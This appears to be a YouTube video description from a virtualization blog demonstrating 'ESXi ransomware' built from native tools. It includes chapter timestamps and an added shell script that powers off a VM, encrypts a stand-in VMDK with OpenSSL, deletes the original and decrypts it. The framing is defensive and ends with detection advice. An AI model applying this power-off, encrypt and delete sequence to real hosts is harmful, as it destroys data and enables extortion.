How easy is it to start encrypting virtual machine disk files in VMware ESXi? Scary easy. In the video we show how you can use simple built-in commands in VMware ESXi to power VMs off, create a key file for encryption, and then begin encrypting files on the ESXi datastore. ESXi contains all the OpenSSL commands needed, in the box, to easily build ESXi ransomware that takes advantage of the native tools. It helps to show the need to secure your ESXi hosts properly.
Subscribe to the channel: https://www.youtube.com/channel/UCrxcWtpd1IGHG9RbD_9380A?sub_confirmation=1
My blog: https://www.virtualizationhowto.com
_____________________________________________________
Social Media: https://twitter.com/vspinmaster
LinkedIn: https://www.linkedin.com/in/brandon-lee-vht/
Github: https://github.com/brandonleegit
Introduction to ESXi ransomware – 0:00
Overview of attacks on VMware ESXi – 0:34
Description of steps needed for an attacker to compromise your ESXi host – 1:29
An overview of my home lab environment for testing – 2:30
How virtual machines are powered off on the VMware ESXi host – 2:45
Getting all VMs on the ESXi host – 3:15
Getting the VM ID number to power them off – 3:30
Using the VM ID to power off a specific VM – 4:00
Generating a random key file used for the encryption process – 4:33
Performing the encryption process on VMware ESXi – 5:20
Running the encrypt command and refreshing the datastore to see the file created – 6:15
Deleting the source file, the good data so you have no recovery – 6:36
Trying to power on the VMware ESXi virtual machine – 7:00
Is the file truly encrypted, or can we simply rename it? – 7:28
The VMDK is found but it still does not power on, confirming it is encrypted – 7:56
Can we reverse the changes to decrypt the encrypted virtual machine file? – 8:26
Running the decryption process using OpenSSL in VMware ESXi – 8:44
Refreshing the directory structure and testing to see if we can power on the ESXi virtual machine – 9:18
Concluding thoughts and wrapping up VMware ESXi ransomware – 10:00
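The chapters above outline one procedure: power the VM off, generate a key file, encrypt the disk file with OpenSSL, delete the original, confirm that a rename does not bring it back, then decrypt. The script below is an added example that reproduces that round trip; it is not the video's own commands and the blog post's exact OpenSSL flags are not on this page, so the cipher and key-derivation options are assumptions (AES-256-CBC with -pbkdf2, which needs OpenSSL 1.1.1 or later). It runs against a constructed stand-in for a VMDK in a scratch directory, only calls vim-cmd when that tool exists (i.e. on an ESXi host; elsewhere the power-off step is skipped), and makes the "is it truly encrypted?" check explicit by looking for the 8-byte Salted__ header that openssl enc writes. The file names, the VM ID and the key path are made up for illustration.

```shell
#!/bin/sh
# Added example, not the video's script: openssl encrypt -> verify -> decrypt
# round trip on a constructed dummy VMDK. Paths, names and VM ID are made up.
set -e

# Power off a VM by its vim-cmd ID. vim-cmd only exists on ESXi, so the step
# is skipped (with a message) when the script is run elsewhere.
esxi_power_off() {
    vmid="$1"
    if command -v vim-cmd >/dev/null 2>&1; then
        vim-cmd vmsvc/power.off "$vmid"
    else
        echo "vim-cmd not found; skipping power-off of VM $vmid (not on ESXi)"
    fi
}

# Write a random 256-bit key (as hex) to a key file and restrict its mode.
make_key() {
    openssl rand -hex 32 > "$1"
    chmod 600 "$1"
}

# Encrypt $1 to $2 with AES-256-CBC; the passphrase is read from key file $3.
# -pbkdf2 is an assumption about the OpenSSL version (1.1.1+).
encrypt_file() {
    openssl enc -aes-256-cbc -pbkdf2 -salt -pass "file:$3" -in "$1" -out "$2"
}

# Reverse of encrypt_file: decrypt $1 to $2 using key file $3.
decrypt_file() {
    openssl enc -d -aes-256-cbc -pbkdf2 -pass "file:$3" -in "$1" -out "$2"
}

# The "can we just rename it?" check: a salted 'openssl enc' output starts
# with the literal 8 bytes "Salted__", so a renamed .enc is still not a VMDK.
is_openssl_encrypted() {
    [ "$(head -c 8 "$1" 2>/dev/null)" = "Salted__" ]
}

# Full round trip in a temporary directory. Returns 0 only when the
# decrypted file hashes identically to the original.
demo_roundtrip() {
    work="$(mktemp -d)"
    orig="$work/vm01-flat.vmdk"            # constructed stand-in for a VMDK
    head -c 1024 /dev/urandom > "$orig"
    sha_before="$(openssl dgst -sha256 -r "$orig" | cut -d' ' -f1)"

    esxi_power_off 1                        # VM ID 1 is a placeholder
    make_key "$work/key.txt"
    encrypt_file "$orig" "$orig.enc" "$work/key.txt"
    rm -f "$orig"                           # the "delete the good data" step

    if ! is_openssl_encrypted "$orig.enc"; then
        echo "output does not look like an openssl enc file"
        rm -rf "$work"
        return 1
    fi

    # Recovery is only possible because the key file is still on the host;
    # real ransomware removes it, which is the whole point of the attack.
    decrypt_file "$orig.enc" "$orig" "$work/key.txt"
    sha_after="$(openssl dgst -sha256 -r "$orig" | cut -d' ' -f1)"
    rm -rf "$work"
    [ "$sha_before" = "$sha_after" ]
}

demo_roundtrip && echo "round trip OK: decrypted file matches original"
```

Note what makes the video's recovery step work: the key file is written to the same host and never removed, so the decrypt command at 8:44 succeeds. An attacker takes the key off-box, which is why the detection you want is on the host activity itself (unexpected power-off of every VM, openssl invocations against datastore files, mass file deletions), not on the encrypted output.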
Read my detailed blog post covering the steps listed here:
– https://www.virtualizationhowto.com/2022/08/i-created-esxi-ransomware-its-scary-easy-and-why-you-need-proper-security/